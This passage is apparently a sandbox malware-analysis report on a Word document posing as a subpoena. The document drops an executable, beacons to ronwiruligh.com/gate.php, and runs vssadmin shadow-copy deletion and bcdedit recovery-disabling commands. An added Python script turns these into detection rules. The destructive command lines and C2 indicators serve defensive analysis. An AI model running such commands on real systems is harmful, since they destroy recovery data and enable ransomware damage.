  - Spawned process "bcdedit.exe" with commandline "bcdedit /set {default} bootstatuspolicy ignoreallfailures"
- source: Monitored Target
- relevance: 3/10
Installation/Persistence
Dropped files
- details:
  - "e2db3261028a110c6f910f59fb0fcd506c671d5119f6a4dba9b15e6655670d3b.LNK" has type "MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Jun 15 00:38:42 2016, mtime=Wed Jun 15 00:38:42 2016, atime=Wed Jun 15 00:38:46 2016, length=226304, window=hide"
  - "index.dat" has type "data"
  - "~WRS{F5C79E07-098D-4F1C-BB33-FE54500E580C}.tmp" has type "FoxPro FPT, blocks size 0, next free block index 218103808, 1st used item "\375""
  - "contraire.exe" has type "PE32 executable (GUI) Intel 80386 for MS Windows"
  - "MSForms.exd" has type "data"
  - "~$Normal.dotm" has type "data"
  - "~$db3261028a110c6f910f59fb0fcd506c671d5119f6a4dba9b15e6655670d3b.doc" has type "data"
- source: Binary File
- relevance: 3/10
Network Related
Found potential URL in binary/memory
- details:
  - Heuristic match: "7m\G ;^t_z9wIevvooh-+0C[?@]~\_~dH>7%s!Vj+n5.cA"
  - Heuristic match: "ronwiruligh.com"
- source: File/Memory
- relevance: 10/10

File Details
universityalliance.com_subpoena.doc
- Filename
- universityalliance.com_subpoena.doc
- Size
- 221KiB (226304 bytes)
- Type
- doc office
- Description
- Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1251, Author: Windows, Template: Normal.dot, Last Saved By: Windows, Revision Number: 4, Name of Creating Application: Microsoft Office Word, Total Editing Time: 01:00, Create Time/Date: Tue Jun 14 12:22:00 2016, Last Saved Time/Date: Tue Jun 14 12:27:00 2016, Number of Pages: 1, Number of Words: 0, Number of Characters: 2, Security: 0
- Architecture
- WINDOWS
- SHA256
- e2db3261028a110c6f910f59fb0fcd506c671d5119f6a4dba9b15e6655670d3b
- MD5
- f33231cd5376a166e9f1574d65ab9f02
- SHA1
- 3f46464a88599a395d1742647cf24b302cc18174
Screenshots
Hybrid Analysis
Analysed 8 processes in total (System Resource Monitor):
- WINWORD.EXE /n "C:\e2db3261028a110c6f910f59fb0fcd506c671d5119f6a4dba9b15e6655670d3b.doc" (PID: 3152)
- contraire.exe (PID: 3056)
- contraire.exe (PID: 3436)
- explorer.exe (PID: 3204)
- firefox.exe -osint -url "%1" (PID: 3276)
- vssadmin.exe delete shadows /all /quiet (PID: 3476)
- bcdedit.exe bcdedit /set {default} recoveryenabled no (PID: 2732)
- bcdedit.exe bcdedit /set {default} bootstatuspolicy ignoreallfailures (PID: 2812)
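A detection pass over the process chain this report records (Office host, an executable dropped in the temp folder, then shadow-copy deletion and boot-recovery tampering), as an added example rather than anything Hybrid Analysis ships. The events are Sysmon-style process-creation records constructed from the process list above; image paths and the parent links of the later processes are assumptions of this example, since the sandbox shows only which processes were spawned. The rules match the exact `vssadmin` and `bcdedit` command lines seen here plus the generic "Office application starts an .exe from a user-writable directory" pattern, and the triage step ranks recovery tampering above everything else because it is the step that makes the rest irreversible.

```python
import ntpath
import re

# Constructed from the report's process list. Paths and the parents of the
# processes after contraire.exe are assumptions made for this example.
EVENTS = [
    {"pid": 3152, "image": r"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE",
     "cmdline": r'/n "C:\e2db3261028a110c6f910f59fb0fcd506c671d5119f6a4dba9b15e6655670d3b.doc"',
     "parent": r"C:\Windows\explorer.exe"},
    {"pid": 3056, "image": r"C:\Users\analyst\AppData\Local\Temp\contraire.exe",
     "cmdline": "contraire.exe",
     "parent": r"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE"},
    {"pid": 3436, "image": r"C:\Users\analyst\AppData\Local\Temp\contraire.exe",
     "cmdline": "contraire.exe",
     "parent": r"C:\Users\analyst\AppData\Local\Temp\contraire.exe"},
    {"pid": 3204, "image": r"C:\Windows\explorer.exe", "cmdline": "explorer.exe",
     "parent": r"C:\Users\analyst\AppData\Local\Temp\contraire.exe"},
    {"pid": 3276, "image": r"C:\Program Files\Mozilla Firefox\firefox.exe",
     "cmdline": 'firefox.exe -osint -url "%1"', "parent": r"C:\Windows\explorer.exe"},
    {"pid": 3476, "image": r"C:\Windows\System32\vssadmin.exe",
     "cmdline": "vssadmin.exe delete shadows /all /quiet", "parent": r"C:\Windows\explorer.exe"},
    {"pid": 2732, "image": r"C:\Windows\System32\bcdedit.exe",
     "cmdline": "bcdedit /set {default} recoveryenabled no", "parent": r"C:\Windows\explorer.exe"},
    {"pid": 2812, "image": r"C:\Windows\System32\bcdedit.exe",
     "cmdline": "bcdedit /set {default} bootstatuspolicy ignoreallfailures",
     "parent": r"C:\Windows\explorer.exe"},
]

OFFICE_HOSTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
USER_WRITABLE = re.compile(
    r"\\(appdata\\local\\temp|appdata\\roaming|users\\public|programdata)\\", re.I)


def _base(path: str) -> str:
    return ntpath.basename(path).lower()


def _has(pattern: str, text: str) -> bool:
    return re.search(pattern, text, re.I) is not None


RULES = {
    # vssadmin delete shadows: the classic pre-encryption step
    "shadow_copy_deletion": lambda e: _base(e["image"]) == "vssadmin.exe"
        and _has(r"\bdelete\s+shadows\b", e["cmdline"]),
    # the two bcdedit changes recorded in this report
    "startup_repair_disabled": lambda e: _base(e["image"]) == "bcdedit.exe"
        and _has(r"\brecoveryenabled\s+no\b", e["cmdline"]),
    "boot_failures_suppressed": lambda e: _base(e["image"]) == "bcdedit.exe"
        and _has(r"\bbootstatuspolicy\s+ignoreallfailures\b", e["cmdline"]),
    # an Office host starting an .exe out of a user-writable directory
    "office_spawned_exe_from_user_dir": lambda e: _base(e["parent"]) in OFFICE_HOSTS
        and e["image"].lower().endswith(".exe")
        and USER_WRITABLE.search(e["image"]) is not None,
}


def evaluate(events: list) -> list:
    """Return (rule_name, pid) for every event that matches a rule."""
    return [(name, e["pid"]) for e in events for name, test in RULES.items() if test(e)]


def triage(findings: list) -> str:
    """Collapse individual hits into one verdict; recovery tampering outranks the rest."""
    names = {n for n, _ in findings}
    if "shadow_copy_deletion" in names and names & {"startup_repair_disabled",
                                                    "boot_failures_suppressed"}:
        return "critical: shadow copies deleted and boot recovery disabled (ransomware staging)"
    if "office_spawned_exe_from_user_dir" in names:
        return "high: Office process launched an executable from a user-writable directory"
    if names:
        return "medium: " + ", ".join(sorted(names))
    return "none"


if __name__ == "__main__":
    hits = evaluate(EVENTS)
    for name, pid in hits:
        print(f"{name:35} pid={pid}")
    print(triage(hits))
```

Against the constructed events this yields four hits (contraire.exe started by WINWORD.EXE from `%TEMP%`, the vssadmin deletion and both bcdedit changes) and a critical verdict. The two explorer-spawned processes (firefox.exe and the injected explorer.exe itself) produce no hit, which is the gap a process-injection rule would need to cover: the report sees the injection, but command-line rules alone cannot.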
Network Analysis
DNS Requests
| Domain | Address | Registrar | Country |
|---|---|---|---|
| ronwiruligh.com | 93.171.202.176 | - | Czech Republic |

Contacted Hosts
| IP Address | Port/Protocol | Associated Process | Details |
|---|---|---|---|
| 93.171.202.176 | 80/TCP | - | Czech Republic, ASN: 50245 (Serverel Corp.) |

HTTP Traffic
| Endpoint | Request | URL |
|---|---|---|
| 93.171.202.176:80 (ronwiruligh.com) | POST | ronwiruligh.com/h/gate.php |

Suricata Alerts
| Event | Category | Description | SID |
|---|---|---|---|
| local -> 93.171.202.176:80 (TCP) | A Network Trojan was detected | ET TROJAN Trojan Generic - POST To gate.php with no referer | 2017930 |
| local -> 93.171.202.176:80 (TCP) | A Network Trojan was detected | ET TROJAN H1N1 Loader CnC Beacon M1 | 2021139 |
| local -> 93.171.202.176:80 (TCP) | A Network Trojan was detected | ETPRO TROJAN H1N1 Loader CnC Beacon HTTP Header | 2820096 |
Extracted Files

Malicious (1)
contraire.exe
- Size
- 66KiB (67072 bytes)
- Type
- PE32 executable (GUI) Intel 80386, for MS Windows
- AV Scan Result
- Labeled as "Inject" (3/56)
- Runtime Process
- WINWORD.EXE (PID: 3152)
- MD5
- 85469d7dc8eeabbfe6b28352bf799168
- SHA1
- 9d763b9d455f241ed5c627c737cc67f04a9d691e
- SHA256
- c97c65e249548a3eef5ea7e7ceaa11cba707f8f44603f1b0fcc8bbaca0dac6ca

Informative (6)
e2db3261028a110c6f910f59fb0fcd506c671d5119f6a4dba9b15e6655670d3b.LNK
- Size
- 733B (733 bytes)
- Type
- MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Jun 15 00:38:42 2016, mtime=Wed Jun 15 00:38:42 2016, atime=Wed Jun 15 00:38:46 2016, length=226304, window=hide
- Runtime Process
- WINWORD.EXE (PID: 3152)
- MD5
- 73cc71d7bf866f0a0e81b7f8b1506952
- SHA1
- 6f0076cfe5284be9e9a9c241ef7d85e528bb4d36
- SHA256
- aa8fd21304f368ba726a59871aeb1d3192d2c92405c5871f66e662e728ecfdc9
-
index.dat
- Size
- 721B (721 bytes)
- Type
- data
- Runtime Process
- WINWORD.EXE (PID: 3152)
- MD5
- f57e55bb32797902b01ef25b1fe0b208
- SHA1
- c6fe6829a7e071d4362ef1202e14c088a1d224e8
- SHA256
- 0cddc86d646759cbc738a42a20a5dd26e369a9759717cf5c234c81bfd18580ac
-
~$Normal.dotm
- Size
- 162B (162 bytes)
- Type
- data
- Runtime Process
- WINWORD.EXE (PID: 3152)
- MD5
- 1ee8335a555cff009c2eb2d9e6da693f
- SHA1
- 2efcf68a7d709bd0bc38382f5eb0efb98fa2083e
- SHA256
- 99599c264c9f6d718ff7942d1b501b0f0a1dec77c7200dba0112344b2ac33fa7
-
~WRS{F5C79E07-098D-4F1C-BB33-FE54500E580C}.tmp
- Size
- 1KiB (1024 bytes)
- Type
- FoxPro FPT, blocks size 0, next free block index 218103808, 1st used item "\375"
- Runtime Process
- WINWORD.EXE (PID: 3152)
- MD5
- 5d4d94ee7e06bbb0af9584119797b23a
- SHA1
- dbb111419c704f116efa8e72471dd83e86e49677
- SHA256
- 4826c0d860af884d3343ca6460b0006a7a2ce7dbccc4d743208585d997cc5fd1
-
MSForms.exd
- Size
- 144KiB (147284 bytes)
- Type
- data
- Runtime Process
- WINWORD.EXE (PID: 3152)
- MD5
- 441a87fc7ff15dcad4d875545b47d36a
- SHA1
- bf0c0386d9df565804a90871a6fae0b2fc5b577a
- SHA256
- dd8ce573c7783bd39c4f07ed40ff488e89a47ac912961839b14c5738cf92499a
-
~$db3261028a110c6f910f59fb0fcd506c671d5119f6a4dba9b15e6655670d3b.doc
- Size
- 162B (162 bytes)
- Type
- data
- Runtime Process
- WINWORD.EXE (PID: 3152)
- MD5
- 1ee8335a555cff009c2eb2d9e6da693f
- SHA1
- 2efcf68a7d709bd0bc38382f5eb0efb98fa2083e
- SHA256
- 99599c264c9f6d718ff7942d1b501b0f0a1dec77c7200dba0112344b2ac33fa7
-
Notifications
-
Runtime
- Added comment to Virus Total report
- Not all sources for signature ID "api-47" are available in the report
- Not all sources for signature ID "api-55" are available in the report
- Not all sources for signature ID "hooks-8" are available in the report
- Not all sources for signature ID "string-43" are available in the report